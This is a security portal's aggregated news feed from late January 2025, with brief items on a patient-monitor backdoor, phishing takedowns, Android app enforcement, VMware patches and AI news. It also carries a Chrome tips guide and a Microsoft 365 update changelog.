Security-Portal.cz is an internet portal focused on computer security, hacking, anonymity, computer networks, programming, encryption, exploits, Linux and BSD systems. It runs a number of interesting services and supports enthusiasts in interesting projects.

Categories

CISA and FDA Warn of Critical Backdoor in Contec CMS8000 Patient Monitors

The Hacker News - 31 January 2025 - 14:10
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have issued alerts about the presence of hidden functionality in Contec CMS8000 patient monitors and Epsimed MN-120 patient monitors. The vulnerability, tracked as CVE-2025-0626, carries a CVSS v4 score of 7.7 on a scale of 10.0. The flaw, alongside two other issues, was reported to CISA
Category: Hacking & Security

This dual camera from Xiaomi sees in colour even at night and turns to follow a thief. It's on sale right now

Zive.cz - security - 31 January 2025 - 13:45
The Xiaomi Outdoor Camera CW500 Dual IP camera arrived on the Czech market only in December and sells from CZK 1,890. HuraMobil is offering it until Sunday for CZK 1,796 if you use the discount code XIAOMI5VIKEND in the cart. Shipping is included. It is an outdoor model with IP66 protection and operating temperatures from −30 to ...
Category: Hacking & Security

Police dismantles HeartSender cybercrime marketplace network

Bleeping Computer - 31 January 2025 - 12:56
Law enforcement authorities in the United States and the Netherlands have seized 39 domains and associated servers used by the HeartSender phishing gang operating out of Pakistan. [...]
Category: Hacking & Security

Top 5 AI-Powered Social Engineering Attacks

The Hacker News - 31 January 2025 - 12:15
Social engineering has long been an effective tactic because of how it focuses on human vulnerabilities. There’s no brute-force ‘spray and pray’ password guessing. No scouring systems for unpatched software. Instead, it simply relies on manipulating emotions such as trust, fear, and respect for authority, usually with the goal of gaining access to sensitive information or protected systems.
Category: Hacking & Security

Italy Bans Chinese DeepSeek AI Over Data Privacy and Ethical Concerns

The Hacker News - 31 January 2025 - 12:04
Italy's data protection watchdog has blocked Chinese artificial intelligence (AI) firm DeepSeek's service within the country, citing a lack of information on its use of users' personal data. The development comes days after the authority, the Garante, sent a series of questions to DeepSeek, asking about its data handling practices and where it obtained its training data. In particular, it wanted
Category: Hacking & Security

9 Google Chrome features you really should be using

Computerworld.com [Hacking News] - 31 January 2025 - 12:00

If you’re like about 70% of computer users worldwide, you use Google’s Chrome browser as your gateway to the web, from conducting research and catching up on news to emailing and interacting with cloud apps. There are several tools built into Chrome that you might not know about, but should. They can improve your browsing experience significantly, enhancing productivity, organization, security, search, and more.

Even if you have already heard about some of these tools, consider this guide a refresher and encouragement to use them.

1. Chrome profiles: Keep work and personal browsing separate

You can add more than one user profile to Chrome. Each profile will have its own set of bookmarks, browsing history, website logins, and other data. For example, you can create one profile specifically for your work-related browsing, so that bookmarks and websites associated with your job are kept separate from your personal activity online.

To create another profile: Click your headshot or current profile icon that’s toward the upper right in Chrome. On the panel for your profile that opens, click Add new profile.

Click your profile icon, then select Add new profile.

Howard Wen / IDG

A large panel will open over the screen. You can create a new profile by signing in with another Google account. If this account already has Chrome profile data (bookmarks, browsing history, logins) associated with it, these will be synced to your PC.

You can sign into an existing Google account or create a profile that’s not connected to a Google account.

Howard Wen / IDG

Or you can select to create a new profile without signing in with another Google account. Browsing information that’s created in Chrome while using this new profile will be saved only on your PC.

Naming a new Chrome profile and choosing a color scheme.

Howard Wen / IDG

After you create the new profile, it’ll appear on the panel of your first profile. Click the name of this new profile; this will launch another instance of Chrome that will let you browse under that profile. You can run two (or more) instances of Chrome on your PC, each with a different user profile.

2. Password checkup: Review (and fix) your website logins

By default, Chrome automatically saves your usernames and passwords for websites that require a login in a service called Google Password Manager. If you don’t use a dedicated password manager app, GPM is a convenient tool for storing and managing login info. (See our separate guide to Google Password Manager.) It’s easy to “set and forget” passwords, so it’s a good idea to periodically check the health of your logins, updating usernames or passwords as needed.

Click the three-dot icon at Chrome’s upper right. On the menu that opens, select Passwords and autofill and then Google Password Manager. GPM will open in a new browser tab, where you’ll see the login information for the websites you’ve saved to GPM. You can click a website name to change or delete your username or password for it.

An important feature to use is the Checkup tool. Along the left, click Checkup. Chrome will analyze all of your website passwords, rating which have weak security and notifying you if any have been compromised or if you’ve reused any across websites. You can click to see a list of the offending passwords, and the password manager’s interface will guide you through changing them.

Check for compromised, reused, or weak passwords, then change them as needed.

Howard Wen / IDG

If you’d like, you can use the password manager as a self-standing app on your PC. When Google Password Manager is open in a tab, click the Install Google Password Manager icon at the right end of the address bar. After it’s installed on your PC, you can click the desktop shortcut to launch Google Password Manager on its own, apart from Chrome.

3. Print to PDF: Turn a web page into a PDF

“Printing” a web page to a PDF can be useful for archiving the page as its contents appeared when you viewed it, or sharing a page when a web link to it won’t be convenient or possible for the person you want to share it with.

The fastest way to do this: With the web page open, hold the Ctrl key and type p on a Windows PC (or the Cmd key and p on a Mac). Alternatively, click the three-dot icon at the upper right of Chrome, and on the menu that opens, select Print.

A large panel opens. To the right of “Destination,” see if “Save as PDF” is listed inside the selection box. If it’s not, click this box to open a dropdown menu and select Save as PDF.

Set the Destination field to Save as PDF.

Howard Wen / IDG

The rest of this panel lists settings for formatting the PDF that you can change. (If you don’t see them, click More settings.) When you’ve set everything the way you want, click Save. You’ll be prompted to select a location on your PC’s storage where you want to save the PDF. Make your choice, and then Chrome will output the entire web page as a PDF and save it to your PC.

4. Reading list: Curate a list of web pages to read later

Chrome offers a nifty feature that lets you gather web pages that you want to remember to read later. The difference between saving a web page to Chrome’s reading list versus saving it as a bookmark is that the reading list is meant to motivate you, such as to read important material for research you’re doing. You can chart your progress by marking a page as read when you’re finished with it.

With the web page open, click the three-dot icon at the upper right of Chrome. On the menu that opens along the right, click Bookmarks and lists and then select Reading list. Then click Add tab to reading list at the bottom of the panel. Repeat this process to add more web pages to the reading list.

To open your reading list, click the three-dot icon at the upper right, then select Bookmarks and lists > Reading list > Show reading list. The list will open in a panel on the right.

Gather web pages you want to read in Chrome’s reading list.

Howard Wen / IDG

On the reading list, clicking the title of a web page opens it in the browser tab to the left. When you’re finished reading it, move the pointer over the page’s title in the list and select the checkmark to mark the page as read or the x to remove it from the reading list.

5. Reading mode: Make lengthy content easier to read

You may come across an article that you want to concentrate on without other elements on the page’s layout (such as ads, images, videos, or sidebars) distracting you. Or maybe your eyesight is struggling with how the text appears on the page. Reading mode can help, and it works very well for reading long articles.

With the web page open, click the three-dot icon at the upper right, then select More tools > Reading mode. Chrome will extract the main article from the page and format it for easier reading in the reading mode panel that appears on the right.

Try reading mode for a distraction-free environment to read long articles.

Howard Wen / IDG

You can widen the reading mode panel by clicking-and-holding the double-bar icon on its left frame. Drag this icon toward the left, and the margins for the text in the reader mode panel will automatically adjust themselves.

Along the top of the reading mode panel is a toolbar that lets you adjust the text font and size, and the spacing between text characters and lines of text. You can also change the background color.

6. Tab groups: Organize and name tab collections

Chrome’s tab groups feature lets you organize tabs of related web pages into a collection that has a title. When you click the group title, all the web pages that you organized under it will open in the browser. This can be useful if you want to open multiple web pages that you frequently visit with a single click. You can create several different tab groups — say, one group for the core web apps you use every day for work, another for research related to a specific project, and so on.

To create a new tab group: At the left end of the Bookmarks toolbar, click the grid icon and select Create new tab group. Alternatively, click the three-dot icon at the upper right of Chrome, and on the menu that opens, select Tab groups > Create new tab group.

Or you can create a new tab group starting from an existing tab: Simply right-click the tab and select Add tab to group > New group from the menu that appears.

A special tab will open that prompts you to type in a name for your new tab group. You can optionally select a highlight color for the new tab group.

Creating a new tab group.

Howard Wen / IDG

Press the Enter key, and your new tab group will appear among the tabs in Chrome. If your Bookmarks toolbar is open, the group will also appear to the left of the grid icon.

To add a web page to a tab group: Simply drag a tab that’s already open in Chrome to the right of the tab group name and let it go.

Adding a tab to a group via drag-and-drop.

Howard Wen / IDG

To close the tabs in a tab group: Click the tab group name. The tabs that are opened to the right of it will close.

To open the tabs in a tab group: Click the tab group name, and the tabs that you organized under it will open to its right. Or, if you have the Bookmarks toolbar open, you can click the tab group name there or click the grid icon and select the group you want to open.

Navigating to a tab group via the Bookmarks toolbar.

Howard Wen / IDG

Finally, you can click the three-dot icon at the upper right of Chrome, then select Tab groups, the name of the tab group that you want, and Open group.

To manage a tab group: Right-click on the tab group name. On the menu that opens, you can click the following:

  • New tab in group: Opens a new, blank tab to the right of the tab group name. The web page you navigate to in this tab will be added to the tab group.
  • Move group to new window: Opens all the web pages organized in this group tab in a new browser window.
  • Ungroup: The web pages in this tab group will be opened, but the tab group (and its name) will be removed. This action essentially “frees” the web pages that you put into this tab group.
  • Close group: Closes a tab group, which removes it from the browser’s tabs toolbar. You can reopen a closed group via the Bookmarks toolbar or by clicking the three-dot icon at Chrome’s upper right, selecting Tab groups, and choosing the group you want.
  • Delete group: Deletes both the tab group name and all the web pages that you organized in it.


7. Google Lens: Search by image

Google Lens is a visual search feature built into Chrome. It lets you search for the source of an image on a web page, find variants of the image, or find similar-looking images. You can also use it to translate foreign words that appear in a photo or other image.

It can also be used to find an item for sale online. For example, if you have Google Lens search a photo of a laptop, it might find an online store where you can buy it.

To use Google Lens in Chrome, right-click on a photo or image on a web page. On the menu that opens, select Search with Google Lens. A panel will open along the right of the browser, showing search results that you can browse through. You can click any result to open its web link in the browser.

Using Google Lens image search.

Howard Wen / IDG

In the main browser window that shows the image Google Lens searched on, you can fine-tune the image search in various ways:

  • Adjust the frame around the image by clicking-and-dragging its corners or sides. This may prompt Google Lens to provide more precise search results.
  • Draw a frame around a specific area of the image. Position the crosshair over the image, then click-and-drag it in any direction to frame the area of the image that you want Google Lens to analyze and search.
  • Translate text that’s in a language other than the one set as your browser’s default. Draw a frame around the text or double-click it to highlight it, then select Translate on the menu that opens. Google Lens will open a translation tool in the panel along the right.

Google Lens can translate text in an image.

Howard Wen / IDG

8. Share a web page: Send a link to another device

You’re viewing a web page on your PC but want to see it on your phone, tablet, or another PC. Here are two unique ways to forward a web page link to another device:

Method 1: Send the link to a signed-in device

First, you must be signed into Chrome with a Google account. The device you want to forward the link to also must be signed into Chrome with the same Google account.

With the web page open in Chrome on your PC, click the three-dot icon toward the upper right. On the menu that opens, select Cast, save, and share and then Send to your devices.

A menu pops open that lists any mobile device and other PCs that are signed in with your Google account. If you click the name of your smartphone on this menu, that device will receive a notification in Chrome. Tap this notification to open the web page.

Sending a web link to a signed-in device.

Howard Wen / IDG

Method 2: Create a QR code for the link

If the smartphone or other device that you want to forward the link to isn’t signed in to your Google account, you can create a QR code for the web page’s link.

With the web page open in Chrome on your PC, click the three-dot icon toward the upper right. On the menu that opens, select Cast, save, and share > Create QR code.

A QR code image will pop open below the web address bar.

Creating a QR code to send a link.

Howard Wen / IDG

Use the smartphone’s camera to capture it — most recent smartphone models will recognize a QR code. When you tap the link that appears, the web page will open in the smartphone’s default browser, whether it’s Chrome or another such as Firefox, Microsoft Edge, or Safari.

9. Translation: Manage the languages that Chrome translates

By default, Chrome offers to translate a web page if it’s not in your preferred native language. (If it doesn’t, click the Translate this page icon at the right end of the address bar or click the three-dot icon at the upper right and choose Translate.)

It’s worth taking the time to manage this feature so that it’s set best for your browsing, particularly if you frequently visit sites that are in languages other than your native one. Click the three-dot icon at the upper right of Chrome. On the menu that opens, scroll to the bottom and select Settings. The Settings page opens in a new tab. Along the left column, click Languages.

On the page that appears, scroll down to the Google Translate section. Here you can tell Chrome to automatically translate pages that are in certain languages without asking you first. You can also tell it not to offer to translate pages in some languages — useful for people who are fluent in more than one language. For languages that you don’t specify as “automatically translate” or “never offer to translate,” Chrome will continue to offer to translate the page.

Setting translation preferences in Chrome.

Howard Wen / IDG

Want more Chrome tips? See 8 great productivity tips for Chrome.

Category: Hacking & Security

Google Bans 158,000 Malicious Android App Developer Accounts in 2024

The Hacker News - 31 January 2025 - 11:45
Google said it blocked over 2.36 million policy-violating Android apps from being published to the Google Play app marketplace in 2024 and banned more than 158,000 bad developer accounts that attempted to publish such harmful apps. The tech giant also noted it prevented 1.3 million apps from getting excessive or unnecessary access to sensitive user data during the time period by working with
Category: Hacking & Security

Microsoft 365: A guide to the updates

Computerworld.com [Hacking News] - 31 January 2025 - 11:30

Microsoft 365 (and Office 365) subscribers get more frequent software updates than those who have purchased Office without a subscription, which means subscribers have access to the latest features, security patches, and bug fixes. But it can be hard to keep track of the changes in each update and know when they’re available. We’re doing this for you, so you don’t have to.

Following are summaries of the updates to Microsoft 365/Office 365 for Windows over the past year, with the latest releases shown first. We’ll add info about new updates as they’re rolled out.

Note: This story covers updates released to the Current Channel for Microsoft 365/Office 365 subscriptions. If you’re a member of Microsoft’s Office Insider preview program or want to get a sneak peek at upcoming features, see the Microsoft 365 Insider blog.

Version 2501 (Build 18429.20132)

Release date: January 30, 2025

In this build, the advanced Track Changes option to set the margin for balloons in Word has been removed.

A wide variety of bugs have also been fixed, including one in which ActiveX controls used an excessive amount of GDI handles in PowerPoint, and another for the entire Office suite in which images couldn’t be pasted from SharePoint.

Get more info about Version 2501 (Build 18429.20132).

Version 2412 (Build 18324.20194)

Release date: January 16, 2025

This build fixes one bug, in which apps would exit unexpectedly when running on Windows Server 2016.

Get more info about Version 2412 (Build 18324.20194).

Version 2412 (Build 18324.20190)

Release date: January 14, 2025

This build fixes a bug in Word in which the layout of tables was changed unexpectedly. It also includes a variety of security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2412 (Build 18324.20190).

Version 2412 (Build 18324.20168)

Release date: January 7, 2025

This build makes tables in Outlook more accessible for screen readers. It also fixes a wide variety of bugs, including one in Word in which a document saved to a network shared folder and set to “Always Open Read-Only” would open in “Editing” mode, and another for the entire Office suite in which the application didn’t render the grid properly after switching from page break preview to normal view.

Get more info about Version 2412 (Build 18324.20168).

Version 2411 (Build 18227.20162)

Release date: December 10, 2024

This build fixes a bug in Word and Outlook where characters didn’t render correctly when using Save Selection to Text Box Gallery. It also includes a variety of security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2411 (Build 18227.20162).

Version 2411 (Build 18227.20152)

Release date: December 5, 2024

This build fixes a wide variety of bugs, including one in Excel in which some cells might not be rendered properly upon scrolling in a worksheet using freeze panes, one in Word that prevented emails with linked SVG content from saving or sending, and one in which some PowerPoint presentations created by third-party tools didn’t open correctly and some content was removed.

Get more info about Version 2411 (Build 18227.20152).

Version 2410 (Build 18129.20158)

Release date: November 12, 2024

This build fixes a variety of bugs, including one in Word in which all characters didn’t appear correctly when creating an Outlook task from OneNote, and one in PowerPoint in which embedded BMP images in the PowerPoint slide were not opening.

This build also includes a variety of security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2410 (Build 18129.20158).

Version 2410 (Build 18129.20116)

Release date: October 28, 2024

This build enables filtering capabilities for the comment pane in Excel and fixes a variety of bugs, including one in Word in which the title bar no longer showed a “Saved” status for locally saved files, and one in PowerPoint in which a graphics-related issue caused the app to close unexpectedly at times.

Get more info about Version 2410 (Build 18129.20116).

Version 2409 (Build 18025.20160)

Release date: October 15, 2024

This build fixes a single bug in Word, in which emails with linked SVG content couldn’t be saved or sent.

Get more info about Version 2409 (Build 18025.20160).

Version 2409 (Build 18025.20140)

Release date: October 8, 2024

This build fixes a variety of bugs, including one in Word in which text wasn’t clearly visible in High Contrast Mode when using “Draft with Copilot” and referencing a meeting under “Reference your content.”

This build also includes multiple security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2409 (Build 18025.20140).

Version 2409 (Build 18025.20104)

Release date: September 25, 2024

This build fixes a single bug, in which when you saved a file in Word, the save status was missing from the Title bar.

Get more info about Version 2409 (Build 18025.20104).

Version 2409 (Build 18025.20096)

Release date: September 23, 2024

This build improves the user experience for selecting which users should have which permissions when a sensitivity label configured for user-defined permissions is applied to a file or when configuring standalone Information Rights Management through the Restrict Access feature. This change affects Excel, PowerPoint, and Word.

The build also fixes a variety of bugs, including one in Word in which Document Mode would switch from “editing” to “viewing” if the user enabled “Track Changes” and set “For Everyone.”

Get more info about Version 2409 (Build 18025.20096).

Version 2408 (Build 17928.20156)

Release date: September 10, 2024

This update will remove Flip video support when the service goes offline on October 1, 2024. The build also includes a variety of security updates. Go here for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2408 (Build 17928.20156).

Version 2408 (Build 17928.20114)

Release date: August 26, 2024

This build allows you to disable connected experiences for privacy concerns without impacting data security policies, such as sensitivity labels. Services associated with Microsoft Purview (e.g., sensitivity labels and rights management) are no longer controlled by policy settings to manage privacy controls for Microsoft 365 Apps. Instead, these services will rely on their existing security admin controls in Purview portals.

The build also fixes a variety of bugs, including one in Outlook that caused default SMIME labels to fail to apply when a user replied to or forwarded an unlabeled message, and one for the entire suite in which people couldn’t install Microsoft 365 apps on an enrolled device.

Get more info about Version 2408 (Build 17928.20114).

Version 2407 (Build 17830.20166)

Release date: August 13, 2024

This build includes a variety of security updates for Excel, Outlook, PowerPoint, Project, Visio, and the entire Office suite. See Microsoft’s Release notes for Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2407 (Build 17830.20166).

Version 2407 (Build 17830.20138)

Release date: August 1, 2024

This build fixes a wide variety of bugs, including one in which coauthoring on text boxes in Excel sometimes gave unexpected results, another in PowerPoint in which line widths were not preserved when exporting arrow shapes to PDF, and another in Word in which revisions were sometimes skipped when reviewing using VBA.

Get more info about Version 2407 (Build 17830.20138).

Version 2406 (Build 17726.20160)

Release date: July 9, 2024

This build fixes several bugs, including one in Word and Excel in which characters didn’t appear correctly in Text Box Gallery. It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2406 (Build 17726.20160).

Version 2406 (Build 17726.20126)

Release date: June 26, 2024

This build fixes a wide variety of bugs, including one in which Excel documents might be unexpectedly edited when a mandatory sensitivity label has not been applied, one that caused Outlook to exit unexpectedly shortly after launch for some users, and one in which pasting data from Word or Excel to an Outlook template as a link would cause an error message to appear.

Get more info about Version 2406 (Build 17726.20126).

Version 2405 (Build 17628.20164)

Release date: June 19, 2024

This build includes a variety of unspecified bug and performance fixes.

Get more info about Version 2405 (Build 17628.20164).

Version 2405 (Build 17628.20144)

Release date: June 11, 2024

This build fixes one bug, which prevented users from sending mail for a few hours after updating add-ins with on-send events. It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2405 (Build 17628.20144).

Version 2405 (Build 17628.20110)

Release date: May 30, 2024

This build fixes a wide variety of bugs, including one in Excel in which an embedded workbook in .xls format might not have closed properly, one that caused Outlook to close when using Copilot Summarize, one in Word in which content controls may have been removed when coauthoring, and one for the entire Office suite in which the Organization Chart Add-In for Microsoft programs was not loading properly.

Get more info about Version 2405 (Build 17628.20110).

Version 2404 (Build 17531.20152)

Release date: May 14, 2024

This build fixes a number of bugs, including one in Word where content controls might be removed when coauthoring, and one that caused Sovereign users to be unable to create ToDo tasks from Outlook.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2404 (Build 17531.20152).

Version 2404 (Build 17531.20140)

Release date: May 7, 2024

This build fixes two bugs in Outlook, one in which it closed unexpectedly using the Scheduling Assistant when creating a new meeting or viewing an existing meeting, and another that caused add-in developers to hit timeouts when retrieving notifications from an Outlook client context.

Get more info about Version 2404 (Build 17531.20140).

Version 2404 (Build 17531.20120)

Release date: April 29, 2024

This build reduces workbook size bloat from unnecessary cell formatting with a new “Check Performance” task pane. In addition, it fixes a wide variety of bugs, including one in Excel in which the default font could not be set; one in Outlook in which custom forms from MAPI form servers stopped responding; one in PowerPoint in which online videos did not play in some cases; one in which opening certain Word documents caused the error, “Word experienced an error trying to open the file”; and one in which the Office update installer appeared to be unresponsive.

Get more info about Version 2404 (Build 17531.20120).

Version 2403 (Build 17425.20176)

Release date: April 9, 2024

This build fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2403 (Build 17425.20176).

Version 2402 (Build 17328.20184)

Release date: March 12, 2024

This build fixes three bugs: one in which Access closed unexpectedly, one in which Excel closed unexpectedly when opening files with pivot tables and table design in macro-enabled files, and one in which Word closed unexpectedly when the undo function was used.

This build also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2402 (Build 17328.20184).

Version 2402 (Build 17328.20162)

Release date: March 4, 2024

This build fixes several bugs, including one that crashed Outlook when a link was clicked on, and another for the entire Office suite in which opened Office apps didn’t automatically start when a laptop was reopened, and an error message appeared after manual relaunch.

Get more info about Version 2402 (Build 17328.20162).

Version 2402 (Build 17328.20142)

Release date: February 28, 2024

This build fixes a variety of bugs, including one that caused Outlook to exit unexpectedly when expanding a conversation in the search results from a search of “All Mailboxes,” and another in which users were not able to create a bullet list with hyphens in PowerPoint.

Get more info about Version 2402 (Build 17328.20142).

Version 2401 (Build 17231.20236)

Release date: February 13, 2024

This build fixes several bugs, including one in which macros were being corrupted when saving Excel files and another that affected the entire Office suite in which add-ins would not load after Click trust for content add-in was selected.

This build also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2401 (Build 17231.20236).

Version 2401 (Build 17231.20194)

Release date: February 1, 2024

This build fixes a single bug in which expanded groups in the message list collapsed when users changed which column they were arranged by.

Get more info about Version 2401 (Build 17231.20194).

Version 2401 (Build 17231.20182)

Release date: January 30, 2024

This build fixes a wide variety of bugs, including one in which Excel would stop responding when saving changes, one in PowerPoint in which Notes and Slide layout would open with incorrect proportions when a file was opened from a protected view, and one in Word in which comment cards appeared too wide and cut off text when changing or switching the screen in use.

Get more info about Version 2401 (Build 17231.20182).

Version 2312 (Build 17126.20132)

Release date: January 9, 2024

This build fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2312 (Build 17126.20132).

Version 2312 (Build 17126.20126)

Release date: January 4, 2023

This build introduces a new sensitivity toolbar in Word, Excel, and PowerPoint that helps users understand the security policies that apply to their documents. It’s available when users are creating copies of their documents in File / Save As. In addition, Office now has a new default theme, which Microsoft says is “more modern and accessible.”

It also fixes a wide variety of bugs, including one in Excel in which Custom Menu text was truncated when right-clicking in a cell, one in PowerPoint in which restoring a previous version of a presentation was not working as expected when using Version History, and one in Word in which the content control end tag was marked at the end of the document automatically if the document was edited in Word Online and then opened in Word desktop.

Get more info about Version 2312 (Build 17126.20126).

Version 2311 (Build 17029.20108)

Release date: December 12, 2023

This build fixes one bug in Outlook, in which the message list was blank when switching between the “Focused” and “Other” views.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2311 (Build 17029.20108).

Version 2311 (Build 17029.20068)

Release date: November 29, 2023

This build automatically inserts image captioning for Excel’s images. When you insert an image into a spreadsheet, accessibility image captioning is automatically generated for you.

It also fixes a wide variety of bugs, including one in Excel in which list box controls would not respond to mouse clicks after scrolling using the mouse wheel, and one in Word in which the language of a presentation was not retained when saving or exporting the presentation to a PDF file.

Get more info about Version 2311 (Build 17029.20068).

Version 2310 (Build 16924.20150)

Release date: November 14, 2023

This build fixes several bugs, including one in which Outlook failed to comply with the default browser settings for some users, and another in which new lines were added to an Outlook signature when pressing Enter in the body of the email.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2310 (Build 16924.20150).

Version 2310 (Build 16924.20124)

Release date: October 31, 2023

This build fixes a bug that caused Outlook to exit unexpectedly when clicking the More link in the Search results list.

Get more info about Version 2310 (Build 16924.20124).

Version 2310 (Build 16924.20106)

Release date: October 25, 2023

In this build, the Teams Meeting App works in Outlook, too. With it, you’ll be able to configure a meeting app while scheduling an invite in Outlook. The meeting app will be ready to use when you chat or join the meeting on Teams.

A wide variety of bugs have also been fixed, including one in Excel where certain Pivot Tables would load slowly; one in which OneNote would close unexpectedly when rapidly navigating from one .PDF file to another .PDF file between different sections, or when performing an undo operation on a .PDF printout insertion; and one in the entire Office suite that caused unexpected black borders to appear around screen captures added with the Insert Screenshot functionality.

Get more info about Version 2310 (Build 16924.20106).

Version 2309 (Build 16827.20166)

Release date: October 10, 2023

This build fixes two bugs, one in which users were missing their Outlook add-ins, and another in Word in which subheading numbering with a custom Style would disappear if the file was saved and reopened. It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2309 (Build 16827.20166).

Version 2309 (Build 16827.20130)

Release date: September 28, 2023

This build introduces two new features, including the ability to disable specific types of automatic data conversions in Excel and support for the “Present in Teams” button to present local files in PowerPoint Live in Microsoft Teams.

Several bugs have also been fixed, including one in which the setting to control how Outlook opens previous items at start-up was missing from the Options window, and another in Word in which the Add-ins tab was not visible when using custom toolbar information.

Get more info about Version 2309 (Build 16827.20130).

Version 2308 (Build 16731.20234)

Release date: September 12, 2023

This build fixes several bugs, including one that caused Outlook to close unexpectedly when viewing an email, and another in PowerPoint in which the presenter view slide section zoomed in and out when zooming in the notes section.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2308 (Build 16731.20234).

Category: Hacking & Security

Google significantly hardened Android security last year. It restricted access to sensitive data for 1.3 million apps

Zive.cz - security - 31 January 2025 - 08:15
** Google has released its Android security summary for last year ** ** It eliminated a large number of malicious apps and their developers ** The restrictions worked both on Google Play and with sideloading
Category: Hacking & Security

Broadcom Patches VMware Aria Flaws – Exploits May Lead to Credential Theft

The Hacker News - 31 January 2025 - 06:49
Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning customers that attackers could exploit them to gain elevated access or obtain sensitive information. The list of identified flaws, which impact versions 8.x of the software, is below - CVE-2025-22218 (CVSS score: 8.5) - A malicious actor with View Only Admin
Category: Hacking & Security

KuCoin to pay nearly $300 million in penalties after guilty plea

Bleeping Computer - 31 January 2025 - 01:18
KuCoin's operator, PEKEN Global Limited, pleaded guilty to operating an unlicensed money-transmitting business and agreed to pay $297 million in penalties to settle charges in the U.S. [...]
Category: Hacking & Security

Backdoor found in two healthcare patient monitors, linked to IP in China

Bleeping Computer - 31 January 2025 - 00:31
The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitoring device, include a backdoor that quietly sends patient data to a remote IP address and downloads and executes files on the device. [...]
Category: Hacking & Security

Coming soon — a fully open reconstruction of Deepseek-R1

Computerworld.com [Hacking News] - 30 January 2025 - 22:13

The Deepseek-R1 model has managed to attract a lot of attention in a short time, especially because it can be used commercially without restrictions.

Now, developers at Hugging Face are trying to reconstruct the generative AI (genAI) model from scratch and develop an alternative to Deepseek-R1 called Open-R1 based on open source code. Although Deepseek is often referred to as an open model, parts of it are not completely open.

“Ensuring that the entire architecture behind R1 is open source is not just about transparency, but about unlocking its full potential,” developer Elie Bakouch, of Hugging Face, told Techcrunch.

In the long run, Open-R1 could make it easier to create genAI models without sharing data with other actors.

Category: Hacking & Security

Google blocked 2.36 million risky Android apps from Play Store in 2024

Bleeping Computer - 30 January 2025 - 21:57
Google blocked 2.3 million Android app submissions to the Play Store in 2024 due to violations of its policies that made them potentially risky for users. [...]
Category: Hacking & Security

Is Apple Intelligence 2.0 on track?

Computerworld.com [Hacking News] - 30 January 2025 - 19:54

Earlier this week, we learned about Apple’s decision to appoint Kim Vorrath, the vice president of the company’s Technology Development Group (TDG), to help build Apple Intelligence under the supervision of John Giannandrea, Apple’s senior vice president for machine learning and AI.

Vorrath, who also serves as a board member at the National Center for Women in IT and sits on the Industrial Advisory Board at Cal Poly, has been with Apple since 1987. She’s taken leadership roles in iOS and OS X — she was even in charge of macOS at one time. Part of the original iPhone development team, she also supervised OS development for iPad, Mac and Vision Pro.

When it comes to bug testing and software quality control, she can say which features are ready to go and which are not. Vorrath also coordinates releases, not just for the specific platform (such as iPhone), but between devices, which means a great deal when you consider how integrated the Apple ecosystem has become.

Getting the band together

That established talent will be critical, given that Apple Intelligence features are also designed to work across the Apple ecosystem.

Of course, making these complex high tech products work well together takes effective organization. Vorrath brings that. She seems to be a person who can organize engineering groups and design effective workflows to optimize what those teams can do. With all these achievements, it is no surprise Vorrath is seen as one of the women who contributed the most to making Apple great.

In her new role, she joins Giannandrea, who allegedly “needs additional help managing an AI group with growing prominence,” Bloomberg reported.

